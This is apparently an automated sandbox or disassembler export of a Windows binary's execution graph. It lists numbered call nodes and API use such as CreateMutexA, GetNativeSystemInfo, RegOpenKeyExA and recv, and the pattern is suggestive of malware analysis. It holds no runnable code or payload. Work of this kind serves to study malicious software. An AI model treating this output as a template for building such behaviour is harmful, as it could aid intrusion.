                                                                                                                                                                                                                                          execution_graph 13072 816a44 13073 816a52 13072->13073 13074 816a5c 13072->13074 13077 81698d 13074->13077 13076 816a76 ___free_lconv_mon 13078 81690a __cftof 4 API calls 13077->13078 13079 81699f 13078->13079 13079->13076 13080 7e9ab8 13082 7e9acc 13080->13082 13083 7e9b08 13082->13083 13084 7ea917 13083->13084 13085 7e9b4b shared_ptr 13083->13085 13086 7ea953 Sleep CreateMutexA 13084->13086 13087 7e9b59 13085->13087 13088 7e5c10 6 API calls 13085->13088 13090 7ea98e 13086->13090 13089 7e9b7c 13088->13089 13091 7e8b30 6 API calls 13089->13091 13092 7e9b8d 13091->13092 13093 7e5c10 6 API calls 13092->13093 13094 7e9cb1 13093->13094 13095 7e8b30 6 API calls 13094->13095 13096 7e9cc2 13095->13096 13046 7e4276 13047 7e2410 5 API calls 13046->13047 13048 7e427f 13047->13048 13018 7ea9f4 13027 7e9230 13018->13027 13020 7eaa03 shared_ptr 13021 7e5c10 6 API calls 13020->13021 13026 7eaab3 shared_ptr __floor_pentium4 13020->13026 13022 7eaa65 13021->13022 13023 7e5c10 6 API calls 13022->13023 13024 7eaa8d 13023->13024 13025 7e5c10 6 API calls 13024->13025 13025->13026 13029 7e9284 shared_ptr 13027->13029 13028 7e5c10 6 API calls 13028->13029 13029->13028 13031 7e944f shared_ptr 13029->13031 13030 7e9543 shared_ptr __floor_pentium4 13030->13020 13031->13030 13032 7e5c10 6 API calls 13031->13032 13034 7e979f shared_ptr 13031->13034 13032->13031 13033 7e98b5 shared_ptr __floor_pentium4 13033->13020 13034->13033 13035 7e5c10 6 API calls 13034->13035 13036 7e9927 shared_ptr __floor_pentium4 13035->13036 13036->13020 12691 7e87b2 12692 7e87b8 GetFileAttributesA 12691->12692 12693 7e87b6 12691->12693 12694 7e87c4 12692->12694 12693->12692 12937 7e2170 12940 7fc6fc 12937->12940 12939 7e217a 12941 7fc724 12940->12941 12942 7fc70c 12940->12942 12941->12939 12942->12941 12944 7fcfbe 12942->12944 12945 7fccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12944->12945 12946 7fcfd0 12945->12946 12946->12942 12947 7ead70 12948 7eaec0 shared_ptr __floor_pentium4 12947->12948 12950 7eaddc shared_ptr 12947->12950 12950->12948 12951 818ab6 12950->12951 12952 818ad1 12951->12952 12953 818868 4 API calls 12952->12953 12954 818adb 12953->12954 12954->12950 12966 7e8d30 12967 7e8d80 12966->12967 12968 7e5c10 6 API calls 12967->12968 12969 7e8d9a shared_ptr __floor_pentium4 12968->12969 13097 7e42b0 13100 7e3ac0 13097->13100 13099 7e42bb shared_ptr 13101 7e3af9 13100->13101 13103 7e32d0 6 API calls 13101->13103 13104 7e3c38 13101->13104 13106 7e3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 13101->13106 13102 7e32d0 6 API calls 13107 7e3c5f 13102->13107 13103->13104 13104->13102 13104->13107 13105 7e3c68 13105->13099 13106->13099 13107->13105 13108 7e3810 4 API calls 13107->13108 13109 7e3cdb 13108->13109 13381 7e77b0 13382 7e77f1 shared_ptr 13381->13382 13383 7e5c10 6 API calls 13382->13383 13385 7e7883 shared_ptr 13382->13385 13383->13385 13384 7e5c10 6 API calls 13387 7e79e3 13384->13387 13385->13384 13386 7e7953 shared_ptr __floor_pentium4 13385->13386 13388 7e5c10 6 API calls 13387->13388 13389 7e7a15 shared_ptr 13388->13389 13390 7e5c10 6 API calls 13389->13390 13395 7e7aa5 shared_ptr __floor_pentium4 13389->13395 13391 7e7b7d 13390->13391 13392 7e5c10 6 API calls 13391->13392 13393 7e7ba0 13392->13393 13394 7e5c10 6 API calls 13393->13394 13394->13395 13396 7e87b0 13397 7e87b8 GetFileAttributesA 13396->13397 13398 7e87b6 13396->13398 13399 7e87c4 13397->13399 13398->13397 13400 7f47b0 13402 7f4eed 13400->13402 13401 7f4f59 shared_ptr __floor_pentium4 13402->13401 13403 7e7d30 7 API calls 13402->13403 13404 7f50ed 13403->13404 13439 7e8380 13404->13439 13406 7f5106 13407 7e5c10 6 API calls 13406->13407 13408 7f5155 13407->13408 13409 7e5c10 6 API calls 13408->13409 13410 7f5171 13409->13410 13445 7e9a00 13410->13445 13440 7e83e5 __cftof 13439->13440 13441 7e5c10 6 API calls 13440->13441 13444 7e8403 shared_ptr __floor_pentium4 13440->13444 13442 7e8427 13441->13442 13443 7e5c10 6 API calls 13442->13443 13443->13444 13444->13406 13446 7e9a3f 13445->13446 13447 7e5c10 6 API calls 13446->13447 13448 7e9a47 13447->13448 13449 7e8b30 6 API calls 13448->13449 13450 7e9a58 13449->13450 13451 7e9ba5 13452 7e9ba7 13451->13452 13453 7e5c10 6 API calls 13452->13453 13454 7e9cb1 13453->13454 13455 7e8b30 6 API calls 13454->13455 13456 7e9cc2 13455->13456 12695 7eb1a0 12696 7eb1f2 12695->12696 12697 7eb3ad CoInitialize 12696->12697 12698 7eb3fa shared_ptr __floor_pentium4 12697->12698 12880 7e20a0 12881 7fc68b __Mtx_init_in_situ 2 API calls 12880->12881 12882 7e20ac 12881->12882 12970 7e4120 12971 7e416a 12970->12971 12973 7e41b2 __floor_pentium4 12971->12973 12974 7e3ee0 12971->12974 12975 7e3f1e 12974->12975 12976 7e3f48 12974->12976 12975->12973 12977 7e3f58 12976->12977 12980 7e2c00 12976->12980 12977->12973 12981 7e2c0e 12980->12981 12987 7fb847 12981->12987 12983 7e2c42 12984 7e2c49 12983->12984 12993 7e2c80 12983->12993 12984->12973 12986 7e2c58 Concurrency::cancel_current_task 12988 7fb854 12987->12988 12991 7fb873 Concurrency::details::_Reschedule_chore 12987->12991 12996 7fcb77 12988->12996 12990 7fb864 12990->12991 12998 7fb81e 12990->12998 12991->12983 13004 7fb7fb 12993->13004 12995 7e2cb2 shared_ptr 12995->12986 12997 7fcb92 CreateThreadpoolWork 12996->12997 12997->12990 12999 7fb827 Concurrency::details::_Reschedule_chore 12998->12999 13002 7fcdcc 12999->13002 13001 7fb841 13001->12991 13003 7fcde1 TpPostWork 13002->13003 13003->13001 13005 7fb807 13004->13005 13007 7fb817 13004->13007 13005->13007 13008 7fca78 13005->13008 13007->12995 13009 7fca8d TpReleaseWork 13008->13009 13009->13007 13129 7eaf20 13130 7eaf63 13129->13130 13141 816660 13130->13141 13135 81663f 4 API calls 13136 7eaf80 13135->13136 13137 81663f 4 API calls 13136->13137 13138 7eaf98 __cftof 13137->13138 13147 7e55f0 13138->13147 13140 7eb04e shared_ptr __floor_pentium4 13142 81a671 __cftof 4 API calls 13141->13142 13143 7eaf69 13142->13143 13144 81663f 13143->13144 13145 81a671 __cftof 4 API calls 13144->13145 13146 7eaf71 13145->13146 13146->13135 13148 7e5610 13147->13148 13150 7e5710 __floor_pentium4 13148->13150 13151 7e22c0 13148->13151 13150->13140 13154 7e2280 13151->13154 13155 7e2296 13154->13155 13158 8187f8 13155->13158 13161 817609 13158->13161 13160 7e22a4 13160->13148 13162 817649 13161->13162 13166 817631 __cftof __floor_pentium4 13161->13166 13163 81690a __cftof 4 API calls 13162->13163 13162->13166 13164 817661 13163->13164 13167 817bc4 13164->13167 13166->13160 13168 817bd5 13167->13168 13169 817be4 __cftof 13168->13169 13174 818168 13168->13174 13179 817dc2 13168->13179 13184 817de8 13168->13184 13194 817f36 13168->13194 13169->13166 13175 818171 13174->13175 13176 818178 13174->13176 13203 817b50 13175->13203 13176->13168 13178 818177 13178->13168 13180 817dcb 13179->13180 13182 817dd2 13179->13182 13181 817b50 4 API calls 13180->13181 13183 817dd1 13181->13183 13182->13168 13183->13168 13186 817e09 __cftof 13184->13186 13187 817def 13184->13187 13185 817f69 13192 817f77 13185->13192 13193 817f8b 13185->13193 13211 818241 13185->13211 13186->13168 13187->13185 13187->13186 13189 817fa2 13187->13189 13187->13192 13189->13193 13207 818390 13189->13207 13192->13193 13215 8186ea 13192->13215 13193->13168 13195 817f4f 13194->13195 13196 817f69 13194->13196 13195->13196 13198 817fa2 13195->13198 13200 817f77 13195->13200 13197 818241 4 API calls 13196->13197 13196->13200 13202 817f8b 13196->13202 13197->13200 13199 818390 4 API calls 13198->13199 13198->13202 13199->13200 13201 8186ea 4 API calls 13200->13201 13200->13202 13201->13202 13202->13168 13204 817b62 13203->13204 13205 818ab6 4 API calls 13204->13205 13206 817b85 13205->13206 13206->13178 13209 8183ab 13207->13209 13208 8183dd 13208->13192 13209->13208 13219 81c88e 13209->13219 13212 81825a 13211->13212 13226 81d3c8 13212->13226 13214 81830d 13214->13192 13214->13214 13217 81875d __floor_pentium4 13215->13217 13218 818707 13215->13218 13216 81c88e __cftof 4 API calls 13216->13218 13217->13193 13218->13216 13218->13217 13222 81c733 13219->13222 13221 81c8a6 13221->13208 13223 81c743 13222->13223 13224 81690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13223->13224 13225 81c748 __cftof 13223->13225 13224->13225 13225->13221 13228 81d3ee 13226->13228 13235 81d3d8 __cftof 13226->13235 13227 81d485 13230 81d4e4 13227->13230 13231 81d4ae 13227->13231 13228->13227 13229 81d48a 13228->13229 13228->13235 13239 81cbdf 13229->13239 13256 81cef8 13230->13256 13233 81d4b3 13231->13233 13234 81d4cc 13231->13234 13245 81d23e 13233->13245 13252 81d0e2 13234->13252 13235->13214 13240 81cbf1 13239->13240 13241 81690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13240->13241 13242 81cc05 13241->13242 13243 81cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13242->13243 13244 81cc0d __alldvrm __cftof _strrchr 13242->13244 13243->13244 13244->13235 13247 81d26c 13245->13247 13246 81d2a5 13246->13235 13247->13246 13248 81d2de 13247->13248 13249 81d2b7 13247->13249 13250 81cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13248->13250 13251 81d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13249->13251 13250->13246 13251->13246 13253 81d10f 13252->13253 13254 81d14e 13253->13254 13255 81d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13253->13255 13254->13235 13255->13254 13257 81cf10 13256->13257 13258 81cf75 13257->13258 13259 81cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13257->13259 13258->13235 13259->13258 13265 7e3fe0 13266 7e4022 13265->13266 13267 7e408c 13266->13267 13268 7e40d2 13266->13268 13271 7e4035 __floor_pentium4 13266->13271 13272 7e35e0 13267->13272 13269 7e3ee0 3 API calls 13268->13269 13269->13271 13273 7e3616 13272->13273 13277 7e364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 13273->13277 13278 7e2ce0 13273->13278 13275 7e369e 13276 7e2c00 3 API calls 13275->13276 13275->13277 13276->13277 13277->13271 13279 7e2d1d 13278->13279 13280 7fbedf InitOnceExecuteOnce 13279->13280 13281 7e2d46 13280->13281 13282 7e2d51 __floor_pentium4 13281->13282 13284 7e2d88 13281->13284 13287 7fbef7 13281->13287 13282->13275 13285 7e2440 4 API calls 13284->13285 13286 7e2d9b 13285->13286 13286->13275 13288 7fbf03 Concurrency::cancel_current_task 13287->13288 13289 7fbf6a 13288->13289 13290 7fbf73 13288->13290 13294 7fbe7f 13289->13294 13292 7e2ae0 5 API calls 13290->13292 13293 7fbf6f 13292->13293 13293->13284 13295 7fcc31 InitOnceExecuteOnce 13294->13295 13296 7fbe97 13295->13296 13297 7fbe9e 13296->13297 13298 816cbb 4 API calls 13296->13298 13297->13293 13299 7fbea7 13298->13299 13299->13293 13457 7e3f9f 13458 7e3fad 13457->13458 13460 7e3fb6 13457->13460 13459 7e2410 5 API calls 13458->13459 13459->13460 13053 7e9adc 13056 7e9aea shared_ptr 13053->13056 13054 7ea917 13055 7ea953 Sleep CreateMutexA 13054->13055 13057 7ea98e 13055->13057 13056->13054 13058 7e9b4b shared_ptr 13056->13058 13059 7e9b59 13058->13059 13060 7e5c10 6 API calls 13058->13060 13061 7e9b7c 13060->13061 13068 7e8b30 13061->13068 13063 7e9b8d 13064 7e5c10 6 API calls 13063->13064 13065 7e9cb1 13064->13065 13066 7e8b30 6 API calls 13065->13066 13067 7e9cc2 13066->13067 13069 7e8b7c 13068->13069 13070 7e5c10 6 API calls 13069->13070 13071 7e8b97 shared_ptr __floor_pentium4 13070->13071 13071->13063 12955 7e215a 12956 7fc6fc InitializeCriticalSectionEx 12955->12956 12957 7e2164 12956->12957 12488 7ea856 12489 7ea870 12488->12489 12490 7ea892 shared_ptr 12488->12490 12489->12490 12494 7ea94e 12489->12494 12491 7ea8a0 12490->12491 12504 7e7d30 12490->12504 12493 7ea953 Sleep CreateMutexA 12496 7ea98e 12493->12496 12494->12493 12495 7ea8ae 12495->12491 12497 7e7d30 7 API calls 12495->12497 12498 7ea8b8 12497->12498 12498->12491 12499 7e7d30 7 API calls 12498->12499 12500 7ea8c2 12499->12500 12500->12491 12501 7e7d30 7 API calls 12500->12501 12502 7ea8cc 12501->12502 12502->12491 12503 7e7d30 7 API calls 12502->12503 12503->12491 12505 7e7d96 __cftof 12504->12505 12542 7e7ee8 shared_ptr __floor_pentium4 12505->12542 12543 7e5c10 12505->12543 12507 7e7dd2 12508 7e5c10 6 API calls 12507->12508 12510 7e7dff shared_ptr 12508->12510 12509 7e7ed3 GetNativeSystemInfo 12511 7e7ed7 12509->12511 12510->12509 12510->12511 12510->12542 12512 7e7f3f 12511->12512 12513 7e8019 12511->12513 12511->12542 12514 7e5c10 6 API calls 12512->12514 12515 7e5c10 6 API calls 12513->12515 12516 7e7f67 12514->12516 12517 7e804c 12515->12517 12518 7e5c10 6 API calls 12516->12518 12519 7e5c10 6 API calls 12517->12519 12520 7e7f86 12518->12520 12521 7e806b 12519->12521 12553 818bbe 12520->12553 12523 7e5c10 6 API calls 12521->12523 12524 7e80a3 12523->12524 12525 7e5c10 6 API calls 12524->12525 12526 7e80f4 12525->12526 12527 7e5c10 6 API calls 12526->12527 12528 7e8113 12527->12528 12529 7e5c10 6 API calls 12528->12529 12530 7e814b 12529->12530 12531 7e5c10 6 API calls 12530->12531 12532 7e819c 12531->12532 12533 7e5c10 6 API calls 12532->12533 12534 7e81bb 12533->12534 12535 7e5c10 6 API calls 12534->12535 12536 7e81f3 12535->12536 12537 7e5c10 6 API calls 12536->12537 12538 7e8244 12537->12538 12539 7e5c10 6 API calls 12538->12539 12540 7e8263 12539->12540 12541 7e5c10 6 API calls 12540->12541 12541->12542 12542->12495 12544 7e5c54 12543->12544 12556 7e4b30 12544->12556 12546 7e5d17 shared_ptr __floor_pentium4 12546->12507 12547 7e5c7b __cftof 12547->12546 12548 7e5da7 RegOpenKeyExA 12547->12548 12549 7e5e00 RegCloseKey 12548->12549 12551 7e5e26 12549->12551 12550 7e5ea6 shared_ptr __floor_pentium4 12550->12507 12551->12550 12552 7e5c10 4 API calls 12551->12552 12682 818868 12553->12682 12555 818bdc 12555->12542 12558 7e4ce5 12556->12558 12559 7e4b92 12556->12559 12558->12547 12559->12558 12560 816da6 12559->12560 12561 816db4 12560->12561 12564 816dc2 __fassign 12560->12564 12565 816d19 12561->12565 12564->12559 12570 81690a 12565->12570 12569 816d3d 12569->12559 12571 816921 12570->12571 12572 81692a 12570->12572 12578 816d52 12571->12578 12572->12571 12584 81a671 12572->12584 12579 816d8f 12578->12579 12580 816d5f 12578->12580 12674 81b67d 12579->12674 12583 816d6e __fassign 12580->12583 12669 81b6a1 12580->12669 12583->12569 12585 81a67b __cftof 12584->12585 12589 81a694 __cftof ___free_lconv_mon 12585->12589 12599 81d82f 12585->12599 12587 81694a 12591 81b5fb 12587->12591 12589->12587 12603 818bec 12589->12603 12592 816960 12591->12592 12593 81b60e 12591->12593 12595 81b628 12592->12595 12593->12592 12634 81f5ab 12593->12634 12596 81b650 12595->12596 12597 81b63b 12595->12597 12596->12571 12597->12596 12641 81e6b1 12597->12641 12602 81d83c __cftof 12599->12602 12600 81d867 RtlAllocateHeap 12601 81d87a 12600->12601 12600->12602 12601->12589 12602->12600 12602->12601 12604 818bf1 __cftof 12603->12604 12608 818bfc __cftof 12604->12608 12609 81d634 12604->12609 12623 8165ed 12608->12623 12611 81d640 __cftof 12609->12611 12610 81d69c __cftof 12610->12608 12611->12610 12612 81d726 12611->12612 12613 81d81b __cftof 12611->12613 12617 81d751 __cftof 12611->12617 12612->12617 12626 81d62b 12612->12626 12614 8165ed __cftof 3 API calls 12613->12614 12616 81d82e 12614->12616 12617->12610 12619 81a671 __cftof 4 API calls 12617->12619 12621 81d7a5 12617->12621 12619->12621 12620 81d62b __cftof 4 API calls 12620->12617 12621->12610 12622 81a671 __cftof 4 API calls 12621->12622 12622->12610 12629 8164c7 12623->12629 12627 81a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12626->12627 12628 81d630 12627->12628 12628->12620 12631 8164d5 __cftof 12629->12631 12630 816520 12631->12630 12632 81652b __cftof GetPEB ExitProcess GetPEB 12631->12632 12633 81652a 12632->12633 12635 81f5b7 __cftof 12634->12635 12636 81a671 __cftof 4 API calls 12635->12636 12638 81f5c0 __cftof 12636->12638 12637 81f606 12637->12592 12638->12637 12639 818bec __cftof 4 API calls 12638->12639 12640 81f62b 12639->12640 12642 81a671 __cftof 4 API calls 12641->12642 12643 81e6bb 12642->12643 12646 81e5c9 12643->12646 12645 81e6c1 12645->12596 12647 81e5d5 __cftof ___free_lconv_mon 12646->12647 12648 81e5f6 12647->12648 12649 818bec __cftof 4 API calls 12647->12649 12648->12645 12650 81e668 12649->12650 12651 81e6a4 12650->12651 12655 81a72e 12650->12655 12651->12645 12656 81a739 __cftof 12655->12656 12657 81d82f __cftof RtlAllocateHeap 12656->12657 12661 81a745 __cftof ___free_lconv_mon 12656->12661 12657->12661 12658 818bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12659 81a7c7 12658->12659 12660 81a7be 12662 81e4b0 12660->12662 12661->12658 12661->12660 12663 81e5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12662->12663 12664 81e4c3 12663->12664 12665 81e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12664->12665 12666 81e4cb __cftof 12665->12666 12667 81e6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12666->12667 12668 81e4dc __cftof ___free_lconv_mon 12666->12668 12667->12668 12668->12651 12670 81690a __cftof 4 API calls 12669->12670 12671 81b6be 12670->12671 12673 81b6ce __floor_pentium4 12671->12673 12679 81f1bf 12671->12679 12673->12583 12675 81a671 __cftof 4 API calls 12674->12675 12676 81b688 12675->12676 12677 81b5fb __cftof 4 API calls 12676->12677 12678 81b698 12677->12678 12678->12583 12680 81690a __cftof 4 API calls 12679->12680 12681 81f1df __cftof __fassign __freea __floor_pentium4 12680->12681 12681->12673 12683 81887a 12682->12683 12684 81690a __cftof 4 API calls 12683->12684 12687 81888f __cftof 12683->12687 12686 8188bf 12684->12686 12685 816d52 4 API calls 12685->12686 12686->12685 12686->12687 12687->12555 12688 816629 12689 8164c7 __cftof 3 API calls 12688->12689 12690 81663a 12689->12690 13010 7fd111 13012 7fd121 13010->13012 13011 7fd12a 13012->13011 13014 7fd199 13012->13014 13015 7fd1a7 SleepConditionVariableCS 13014->13015 13017 7fd1c0 13014->13017 13015->13017 13017->13012 13260 7e2b10 13261 7e2b1c 13260->13261 13262 7e2b1a 13260->13262 13263 7fc26a 5 API calls 13261->13263 13264 7e2b22 13263->13264 13461 7e2b90 13462 7e2bce 13461->13462 13463 7fb7fb TpReleaseWork 13462->13463 13464 7e2bdb shared_ptr __floor_pentium4 13463->13464 13300 7f87d0 13301 7f882a __cftof 13300->13301 13307 7f9bb0 13301->13307 13305 7f88d9 std::_Throw_future_error 13306 7f886c __floor_pentium4 13320 7f9ef0 13307->13320 13309 7f9be5 13310 7e2ce0 5 API calls 13309->13310 13311 7f9c16 13310->13311 13324 7f9f70 13311->13324 13313 7f8854 13313->13306 13314 7e43f0 13313->13314 13315 7fbedf InitOnceExecuteOnce 13314->13315 13316 7e440a 13315->13316 13317 7e4411 13316->13317 13318 816cbb 4 API calls 13316->13318 13317->13305 13319 7e4424 13318->13319 13321 7f9f0c 13320->13321 13322 7fc68b __Mtx_init_in_situ 2 API calls 13321->13322 13323 7f9f17 13322->13323 13323->13309 13325 7f9fef shared_ptr 13324->13325 13327 7fa058 13325->13327 13329 7fa210 13325->13329 13328 7fa03b 13328->13313 13330 7fa290 13329->13330 13336 7f71d0 13330->13336 13332 7fa2cc shared_ptr 13333 7fa4be shared_ptr 13332->13333 13334 7e3ee0 3 API calls 13332->13334 13333->13328 13335 7fa4a6 13334->13335 13335->13328 13337 7f7211 13336->13337 13344 7e3970 13337->13344 13339 7f7446 __floor_pentium4 13339->13332 13340 7f72ad __cftof 13340->13339 13341 7fc68b __Mtx_init_in_situ 2 API calls 13340->13341 13342 7f7401 13341->13342 13349 7e2ec0 13342->13349 13345 7fc68b __Mtx_init_in_situ 2 API calls 13344->13345 13346 7e39a7 13345->13346 13347 7fc68b __Mtx_init_in_situ 2 API calls 13346->13347 13348 7e39e6 13347->13348 13348->13340 13350 7e2f06 13349->13350 13356 7e2f6f 13349->13356 13351 7fc6ac GetSystemTimePreciseAsFileTime 13350->13351 13352 7e2f12 13351->13352 13353 7e301e 13352->13353 13358 7e2f1d __Mtx_unlock 13352->13358 13354 7fc26a 5 API calls 13353->13354 13355 7e3024 13354->13355 13357 7fc26a 5 API calls 13355->13357 13359 7fc6ac GetSystemTimePreciseAsFileTime 13356->13359 13368 7e2fef 13356->13368 13360 7e2fb9 13357->13360 13358->13355 13358->13356 13359->13360 13361 7fc26a 5 API calls 13360->13361 13362 7e2fc0 __Mtx_unlock 13360->13362 13361->13362 13363 7fc26a 5 API calls 13362->13363 13364 7e2fd8 13362->13364 13363->13364 13365 7fc26a 5 API calls 13364->13365 13364->13368 13366 7e303c 13365->13366 13367 7fc6ac GetSystemTimePreciseAsFileTime 13366->13367 13377 7e3080 shared_ptr __Mtx_unlock 13367->13377 13368->13339 13369 7fc26a 5 API calls 13370 7e31cb 13369->13370 13371 7fc26a 5 API calls 13370->13371 13372 7e31d1 13371->13372 13373 7fc26a 5 API calls 13372->13373 13379 7e3193 __Mtx_unlock 13373->13379 13374 7e31a7 __floor_pentium4 13374->13339 13375 7fc26a 5 API calls 13376 7e31dd 13375->13376 13377->13370 13377->13374 13378 7fc6ac GetSystemTimePreciseAsFileTime 13377->13378 13380 7e315f 13377->13380 13378->13380 13379->13374 13379->13375 13380->13369 13380->13372 13380->13379 12883 7e3c8e 12884 7e3c98 12883->12884 12886 7e3ca5 12884->12886 12891 7e2410 12884->12891 12887 7e3ccf 12886->12887 12888 7e3810 4 API calls 12886->12888 12889 7e3810 4 API calls 12887->12889 12888->12887 12890 7e3cdb 12889->12890 12892 7e2424 12891->12892 12895 7fb52d 12892->12895 12903 813aed 12895->12903 12897 7e242a 12897->12886 12898 7fb5a5 ___std_exception_copy 12910 7fb1ad 12898->12910 12899 7fb598 12906 7faf56 12899->12906 12914 814f29 12903->12914 12905 7fb555 12905->12897 12905->12898 12905->12899 12907 7faf9f ___std_exception_copy 12906->12907 12909 7fafb2 shared_ptr 12907->12909 12920 7fb39f 12907->12920 12909->12897 12911 7fb1d8 12910->12911 12913 7fb1e1 shared_ptr 12910->12913 12912 7fb39f 5 API calls 12911->12912 12912->12913 12913->12897 12915 814f2e __cftof 12914->12915 12915->12905 12916 81d634 __cftof 4 API calls 12915->12916 12917 818bfc __cftof 12915->12917 12916->12917 12918 8165ed __cftof 3 API calls 12917->12918 12919 818c2f 12918->12919 12921 7fbedf InitOnceExecuteOnce 12920->12921 12922 7fb3e1 12921->12922 12923 7fb3e8 12922->12923 12931 816cbb 12922->12931 12923->12909 12932 816cc7 __cftof 12931->12932 12933 81a671 __cftof 4 API calls 12932->12933 12936 816ccc 12933->12936 12934 818bec __cftof 4 API calls 12935 816cf6 12934->12935 12936->12934 12846 7fd0c7 12848 7fd0d7 12846->12848 12847 7fd17f 12848->12847 12849 7fd17b RtlWakeAllConditionVariable 12848->12849 12759 7e3c47 12760 7e3c51 12759->12760 12763 7e3c5f 12760->12763 12766 7e32d0 12760->12766 12761 7e3c68 12763->12761 12783 7e3810 12763->12783 12787 7fc6ac 12766->12787 12769 7e3314 12770 7e333c __Mtx_unlock 12769->12770 12790 7fc26a 12769->12790 12771 7fc26a 5 API calls 12770->12771 12772 7e3350 __floor_pentium4 12770->12772 12773 7e3377 12771->12773 12772->12763 12774 7fc6ac GetSystemTimePreciseAsFileTime 12773->12774 12775 7e33af 12774->12775 12776 7fc26a 5 API calls 12775->12776 12777 7e33b6 12775->12777 12776->12777 12778 7fc26a 5 API calls 12777->12778 12779 7e33d7 __Mtx_unlock 12777->12779 12778->12779 12780 7fc26a 5 API calls 12779->12780 12782 7e33eb 12779->12782 12781 7e340e 12780->12781 12781->12763 12782->12763 12784 7e381c 12783->12784 12829 7e2440 12784->12829 12794 7fc452 12787->12794 12789 7fc6b9 12789->12769 12791 7fc292 12790->12791 12792 7fc274 12790->12792 12791->12791 12792->12791 12811 7fc297 12792->12811 12795 7fc4a8 12794->12795 12797 7fc47a __floor_pentium4 12794->12797 12795->12797 12800 7fcf6b 12795->12800 12797->12789 12798 7fc4fd __Xtime_diff_to_millis2 12798->12797 12799 7fcf6b _xtime_get GetSystemTimePreciseAsFileTime 12798->12799 12799->12798 12801 7fcf7a 12800->12801 12803 7fcf87 __aulldvrm 12800->12803 12801->12803 12804 7fcf44 12801->12804 12803->12798 12807 7fcbea 12804->12807 12808 7fcbfb GetSystemTimePreciseAsFileTime 12807->12808 12809 7fcc07 12807->12809 12808->12809 12809->12803 12814 7e2ae0 12811->12814 12813 7fc2ae Concurrency::cancel_current_task 12822 7fbedf 12814->12822 12816 7e2aff 12816->12813 12817 7e2af4 __cftof 12817->12816 12818 81a671 __cftof 4 API calls 12817->12818 12819 816ccc 12818->12819 12820 818bec __cftof 4 API calls 12819->12820 12821 816cf6 12820->12821 12825 7fcc31 12822->12825 12826 7fcc3f InitOnceExecuteOnce 12825->12826 12828 7fbef2 12825->12828 12826->12828 12828->12817 12832 7fb5d6 12829->12832 12831 7e2472 12833 7fb5f1 Concurrency::cancel_current_task 12832->12833 12834 818bec __cftof 4 API calls 12833->12834 12836 7fb658 __cftof __floor_pentium4 12833->12836 12835 7fb69f 12834->12835 12836->12831 13124 7e9f44 13125 7e9f4c shared_ptr 13124->13125 13126 7ea953 Sleep CreateMutexA 13125->13126 13128 7ea01f shared_ptr 13125->13128 13127 7ea98e 13126->13127 12699 7e8780 12700 7e8786 12699->12700 12706 816729 12700->12706 12703 7e87a6 12705 7e87a0 12713 816672 12706->12713 12708 7e8793 12708->12703 12709 8167b7 12708->12709 12710 8167c3 __cftof 12709->12710 12712 8167cd __cftof 12710->12712 12725 816740 12710->12725 12712->12705 12714 81667e __cftof 12713->12714 12716 816685 __cftof 12714->12716 12717 81a8c3 12714->12717 12716->12708 12718 81a8cf __cftof 12717->12718 12721 81a967 12718->12721 12720 81a8ea 12720->12716 12724 81a98a 12721->12724 12722 81d82f __cftof RtlAllocateHeap 12723 81a9d0 ___free_lconv_mon 12722->12723 12723->12720 12724->12722 12724->12723 12724->12724 12726 816762 12725->12726 12728 81674d __cftof ___free_lconv_mon 12725->12728 12726->12728 12729 81a038 12726->12729 12728->12712 12730 81a075 12729->12730 12731 81a050 12729->12731 12730->12728 12731->12730 12733 820439 12731->12733 12735 820445 __cftof 12733->12735 12734 82044d __cftof __dosmaperr 12734->12730 12735->12734 12737 82052b 12735->12737 12738 82054d 12737->12738 12742 820551 __cftof __dosmaperr 12737->12742 12738->12742 12743 8200d2 12738->12743 12742->12734 12745 8200e3 12743->12745 12744 820106 12744->12742 12747 81fcc0 12744->12747 12745->12744 12746 81a671 __cftof 4 API calls 12745->12746 12746->12744 12748 81fd0d 12747->12748 12749 81690a __cftof 4 API calls 12748->12749 12750 81fd1c __cftof 12749->12750 12751 81b67d 4 API calls 12750->12751 12752 81c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12750->12752 12753 81ffbc __floor_pentium4 12750->12753 12751->12750 12752->12750 12753->12742 12850 7e20c0 12853 7fc68b 12850->12853 12852 7e20cc 12856 7fc3d5 12853->12856 12855 7fc69b 12855->12852 12857 7fc3eb 12856->12857 12858 7fc3e1 12856->12858 12857->12855 12859 7fc3be 12858->12859 12860 7fc39e 12858->12860 12869 7fcd0a 12859->12869 12860->12857 12865 7fccd5 12860->12865 12863 7fc3d0 12863->12855 12866 7fc3b7 12865->12866 12867 7fcce3 InitializeCriticalSectionEx 12865->12867 12866->12855 12867->12866 12870 7fcd1f RtlInitializeConditionVariable 12869->12870 12870->12863 12871 7ee0c0 recv 12872 7ee122 recv 12871->12872 12873 7ee157 recv 12872->12873 12874 7ee191 12873->12874 12875 7ee2b3 __floor_pentium4 12874->12875 12876 7fc6ac GetSystemTimePreciseAsFileTime 12874->12876 12877 7ee2ee 12876->12877 12878 7fc26a 5 API calls 12877->12878 12879 7ee358 12878->12879 13042 7e8980 13044 7e8aea 13042->13044 13045 7e89d8 shared_ptr 13042->13045 13043 7e5c10 6 API calls 13043->13045 13045->13043 13045->13044 13049 7e2e00 13050 7e2e28 13049->13050 13051 7fc68b __Mtx_init_in_situ 2 API calls 13050->13051 13052 7e2e33 13051->13052
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,0081652A,?,?,?,?,?,00817661), ref: 00816566
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
